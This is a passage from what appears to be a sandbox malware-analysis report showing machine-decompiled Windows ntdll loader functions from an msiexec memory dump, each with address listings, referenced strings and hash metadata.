							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x4df8464; // 0x73b80110
					 *0x4dfb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E04D39B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x4df5780 & 0x00000005) != 0) {
						_push(_t49);
						E04D85510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                              0x04d38e0f
                              0x04d38e16
                              0x04d38e19
                              0x04d38e1b
                              0x04d38e21
                              0x04d38e7f
                              0x04d38e85
                              0x04d79354
                              0x04d7936c
                              0x04d79371
                              0x04d7937b
                              0x04d79381
                              0x04d79381
                              0x04d7937b
                              0x04d38e9d
                              0x04d38e9d
                              0x04d38e29
                              0x04d38e2c
                              0x04d38e38
                              0x04d38e3e
                              0x04d38e43
                              0x04d38eb5
                              0x04d38eb9
                              0x04d792aa
                              0x04d792af
                              0x04d792e8
                              0x04d792e8
                              0x04d792af
                              0x04d38eb9
                              0x04d38e45
                              0x04d38e53
                              0x04d38e5b
                              0x04d38e5f
                              0x04d38e78
                              0x04d38e78
                              0x04d38e7d
                              0x04d38ec3
                              0x04d38ecd
                              0x04d38ed2
                              0x04d38ed2
                              0x04d38ec5
                              0x04d38ec5
                              0x00000000
                              0x04d38e7d
                              0x04d38e67
                              0x04d38ea4
                              0x04d7931a
                              0x00000000
                              0x00000000
                              0x04d79320
                              0x04d38ea4
                              0x04d38e70
                              0x04d79325
                              0x04d79340
                              0x04d79345
                              0x04d79345
                              0x04d38e76
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000

                              Strings
                              • Querying the active activation context failed with status 0x%08lx, xrefs: 04D79357
                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 04D7932A
                              • LdrpFindDllActivationContext, xrefs: 04D79331, 04D7935D
                              • minkernel\ntdll\ldrsnap.c, xrefs: 04D7933B, 04D79367
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                              • API String ID: 0-3779518884
                              • Opcode ID: ee7b58c5aa294c36228ef6f97992a01eceba44848d93c1b30d47a8a4f5daec85
                              • Instruction ID: 87bfe76c7b928b7ff86fb0170bb2303c3324bd8fe4b20549a123b8e5569e0c41
                              • Opcode Fuzzy Hash: ee7b58c5aa294c36228ef6f97992a01eceba44848d93c1b30d47a8a4f5daec85
                              • Instruction Fuzzy Hash: E341F632B00315AFDF35BE188898A75B6F5FB00746F05817AF85577151EB62BC80A781
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D18794 Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                              Download Yara Rule
                              C-Code - Quality: 83%
                              			E04D18794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E04D1934A() != 0) {
								_t159 = E04D8A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x4df5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E04D85510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x4df5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E04D1849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E04D18999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E04D18999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x4df5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x4df5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E04D22280(_t92, 0x4df86cc);
															_t94 = E04DD9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E04D361A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x4df5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E04D18A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x4df5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x4df5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E04D4F380(_t136, 0x4ce1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E04D22280(_t108, 0x4df86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E04D361A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E04DD9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E04D1FFB0(_t118, _t156, 0x4df86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E04D49A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                              0x04d18799
                              0x04d1879d
                              0x04d187a1
                              0x04d187a3
                              0x04d187a8
                              0x04d187c3
                              0x04d187c3
                              0x04d187c8
                              0x04d187d1
                              0x04d187d4
                              0x04d187d8
                              0x04d187e5
                              0x04d187ec
                              0x04d69bfe
                              0x04d69c00
                              0x04d69c02
                              0x04d69c08
                              0x04d69c0d
                              0x04d69c0f
                              0x04d69c14
                              0x04d69c2d
                              0x04d69c32
                              0x04d69c37
                              0x04d69c3a
                              0x04d69c3c
                              0x04d69c42
                              0x04d69c42
                              0x04d69c3c
                              0x04d69c02
                              0x04d187da
                              0x04d187df
                              0x04d187e3
                              0x00000000
                              0x00000000
                              0x04d187e3
                              0x04d187f2
                              0x00000000
                              0x04d187fb
                              0x04d187fd
                              0x04d187fe
                              0x04d1880e
                              0x04d1880f
                              0x04d18810
                              0x04d18814
                              0x04d1881a
                              0x04d1881c
                              0x04d1881f
                              0x04d18821
                              0x04d18822
                              0x04d18824
                              0x04d18826
                              0x04d1882c
                              0x04d1882e
                              0x04d69c48
                              0x04d69c48
                              0x04d18834
                              0x04d18834
                              0x04d18837
                              0x00000000
                              0x00000000
                              0x04d18837
                              0x04d1882e
                              0x04d1883d
                              0x04d18840
                              0x04d18843
                              0x04d18846
                              0x04d18849
                              0x04d1884c
                              0x04d1884e
                              0x04d18850
                              0x04d18852
                              0x04d18854
                              0x04d18857
                              0x04d188b4
                              0x04d188b6
                              0x04d188b6
                              0x04d18859
                              0x04d18859
                              0x04d18859
                              0x04d18861
                              0x04d18866
                              0x04d1886a
                              0x04d1893d
                              0x04d18941
                              0x00000000
                              0x04d18947
                              0x04d18947
                              0x04d1894a
                              0x04d1894c
                              0x00000000
                              0x04d18952
                              0x04d18955
                              0x04d1895a
                              0x04d1895d
                              0x04d1895d
                              0x04d1895f
                              0x04d18961
                              0x04d18961
                              0x04d18968
                              0x00000000
                              0x00000000
                              0x04d1896a
                              0x04d1896b
                              0x04d1896e
                              0x00000000
                              0x04d18970
                              0x04d18970
                              0x04d18970
                              0x04d18970
                              0x04d18972
                              0x04d18972
                              0x04d18974
                              0x00000000
                              0x04d1897a
                              0x04d1897a
                              0x04d1897d
                              0x00000000
                              0x04d18983
                              0x04d69c65
                              0x04d69c6d
                              0x04d69c72
                              0x04d69c75
                              0x04d69c75
                              0x04d69c82
                              0x04d69c86
                              0x04d69c87
                              0x04d69c88
                              0x04d69c89
                              0x04d69c8c
                              0x04d69c90
                              0x04d69c95
                              0x04d69c97
                              0x04d69ca0
                              0x04d69ca3
                              0x04d69ca9
                              0x04d69ca9
                              0x00000000
                              0x04d69ca9
                              0x04d69ca3
                              0x00000000
                              0x04d69c97
                              0x04d1897d
                              0x00000000
                              0x04d18974
                              0x04d18988
                              0x04d18992
                              0x04d18996
                              0x00000000
                              0x04d18996
                              0x04d1894c
                              0x00000000
                              0x04d18870
                              0x04d1887b
                              0x04d1887d
                              0x04d1887f
                              0x04d18881
                              0x04d18884
                              0x04d18884
                              0x04d18886
                              0x04d18889
                              0x04d1888c
                              0x04d1888e
                              0x04d18891
                              0x04d18891
                              0x04d18898
                              0x00000000
                              0x00000000
                              0x04d1889a
                              0x04d1889b
                              0x04d1889e
                              0x00000000
                              0x00000000
                              0x04d188a0
                              0x04d188a8
                              0x04d188b0
                              0x04d188b2
                              0x04d188d3
                              0x04d188d5
                              0x00000000
                              0x04d188d7
                              0x04d188db
                              0x04d188dc
                              0x04d188e0
                              0x04d188e8
                              0x04d188ee
                              0x04d188f0
                              0x04d188f3
                              0x04d188fc
                              0x04d18901
                              0x04d18906
                              0x04d1890c
                              0x04d1890c
                              0x04d1890f
                              0x04d18916
                              0x04d18917
                              0x04d18918
                              0x04d18919
                              0x04d1891a
                              0x04d1891f
                              0x04d18921
                              0x04d69c52
                              0x04d69c55
                              0x04d69c5b
                              0x04d69cac
                              0x04d69cc0
                              0x04d69cc0
                              0x04d69c55
                              0x04d18927
                              0x04d18927
                              0x04d1892f
                              0x04d18933
                              0x00000000
                              0x04d188f5
                              0x04d188f5
                              0x00000000
                              0x04d188f7
                              0x04d188f7
                              0x04d188fa
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d188fa
                              0x04d188f5
                              0x04d188f3
                              0x00000000
                              0x04d188d5
                              0x00000000
                              0x04d188b2
                              0x04d188c9
                              0x00000000
                              0x04d188c9
                              0x04d1887f
                              0x04d1886a
                              0x04d18857
                              0x04d18852
                              0x04d188bf
                              0x04d188bf
                              0x04d187aa
                              0x04d187ad
                              0x04d187ae
                              0x04d187b4
                              0x04d187b5
                              0x04d187b6
                              0x04d187b8
                              0x04d187bd
                              0x04d187c1
                              0x04d187f4
                              0x04d187fa
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d187c1
                              0x00000000

                              Strings
                              • minkernel\ntdll\ldrsnap.c, xrefs: 04D69C28
                              • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 04D69C18
                              • LdrpDoPostSnapWork, xrefs: 04D69C1E
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                              • API String ID: 0-1948996284
                              • Opcode ID: c450c42aeec325f92ff0cd2e5b677cbaa27c7ed96ad87da9c8b343a699f11314
                              • Instruction ID: 8ebe9ece9284c68b8755f52e45f8858481c8f41cd0566a6954b3c70d6903c54b
                              • Opcode Fuzzy Hash: c450c42aeec325f92ff0cd2e5b677cbaa27c7ed96ad87da9c8b343a699f11314
                              • Instruction Fuzzy Hash: 9C91E071B00216BBDB28EF59E4909BAB3B5FF45344B1541A9FC05AB260E730FD01EBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D17E41 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                              Download Yara Rule
                              C-Code - Quality: 98%
                              			E04D17E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E04D1CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E04D0C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x4df5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E04D85510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x4df5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E04D27D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04D27D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E04D87016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E04D27D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04D27D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E04D87016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E04D3A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E04D0B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                              0x04d17e4c
                              0x04d17e50
                              0x04d17e55
                              0x04d17e58
                              0x04d17e5d
                              0x04d17e71
                              0x04d17f33
                              0x04d17e77
                              0x04d17e77
                              0x04d17e79
                              0x04d17e79
                              0x04d17e7e
                              0x04d17f45
                              0x04d69848
                              0x00000000
                              0x04d69848
                              0x04d17f4e
                              0x04d17f53
                              0x04d17f5a
                              0x00000000
                              0x00000000
                              0x04d6985a
                              0x04d69862
                              0x04d69866
                              0x00000000
                              0x04d6986c
                              0x00000000
                              0x04d6986c
                              0x04d17e84
                              0x04d17e84
                              0x04d17e8d
                              0x04d69871
                              0x04d17eb8
                              0x04d17ec0
                              0x04d17ec0
                              0x04d17e9a
                              0x04d6987e
                              0x00000000
                              0x00000000
                              0x04d69884
                              0x04d6988b
                              0x04d698a7
                              0x04d698ac
                              0x04d698b1
                              0x04d698b6
                              0x04d698b8
                              0x04d698b8
                              0x04d698b9
                              0x00000000
                              0x04d698b9
                              0x04d17ea0
                              0x04d17ea7
                              0x00000000
                              0x00000000
                              0x04d17eac
                              0x04d17eb1
                              0x04d17ec6
                              0x04d17ed0
                              0x04d698cc
                              0x04d17ed6
                              0x04d17ed6
                              0x04d17ed6
                              0x04d17ede
                              0x04d17ee3
                              0x04d698e3
                              0x04d698f0
                              0x04d69902
                              0x04d698f2
                              0x04d698fb
                              0x04d698fb
                              0x04d69907
                              0x04d6991d
                              0x04d6991d
                              0x04d69907
                              0x04d698e3
                              0x04d17ef0
                              0x04d17f14
                              0x04d17f14
                              0x04d17f1e
                              0x04d69946
                              0x04d17f24
                              0x04d17f24
                              0x04d17f24
                              0x04d17f2c
                              0x04d6996a
                              0x04d69975
                              0x04d69975
                              0x04d6997e
                              0x04d69993
                              0x04d69993
                              0x04d6997e
                              0x00000000
                              0x04d17ef2
                              0x04d17efc
                              0x04d17f0a
                              0x04d17f0e
                              0x04d69933
                              0x00000000
                              0x04d69933
                              0x00000000
                              0x04d17f0e
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d17eb1

                              Strings
                              • minkernel\ntdll\ldrmap.c, xrefs: 04D698A2
                              • Could not validate the crypto signature for DLL %wZ, xrefs: 04D69891
                              • LdrpCompleteMapModule, xrefs: 04D69898
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                              • API String ID: 0-1676968949
                              • Opcode ID: ec190aed734eea31eaf02dc17b2d6a52de6c0f016cb234e4ea44c2b9c1cb9fc9
                              • Instruction ID: dfc61d0854f17915cce1ad72f7156e89559be1529992494d6eab6894cd5f0e6e
                              • Opcode Fuzzy Hash: ec190aed734eea31eaf02dc17b2d6a52de6c0f016cb234e4ea44c2b9c1cb9fc9
                              • Instruction Fuzzy Hash: 9F51BD71B04746ABE721CE58D994B2ABBE4FB01714F1405AAEC929B7F1D774F900CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D0E620 Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                              Download Yara Rule
                              C-Code - Quality: 93%
                              			E04D0E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E04D0F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E04D495D0();
						}
						if(_t78 != 0) {
							L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E04D4FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E04D4BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E04D49600();
					if(_t97 < 0) {
						goto L6;
					}
					E04D4BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L04D0F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E04D4BB40(_t83, _t102 + 0x24, _t78);
								if(L04D143C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E04D4BB40(_t84, _t102 + 0x24, _t94);
									if(L04D143C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                              0x04d0e620
                              0x04d0e628
                              0x04d0e62f
                              0x04d0e631
                              0x04d0e635
                              0x04d0e637
                              0x04d0e63e
                              0x04d65503
                              0x04d65503
                              0x04d0e64c
                              0x04d0e64c
                              0x04d0e651
                              0x00000000
                              0x00000000
                              0x04d0e661
                              0x04d0e665
                              0x04d6542a
                              0x04d0e715
                              0x04d0e71a
                              0x04d0e71c
                              0x04d0e720
                              0x04d0e720
                              0x04d0e727
                              0x04d0e736
                              0x04d0e736
                              0x04d0e743
                              0x04d0e743
                              0x04d0e673
                              0x04d0e678
                              0x04d0e67d
                              0x04d0e682
                              0x04d0e685
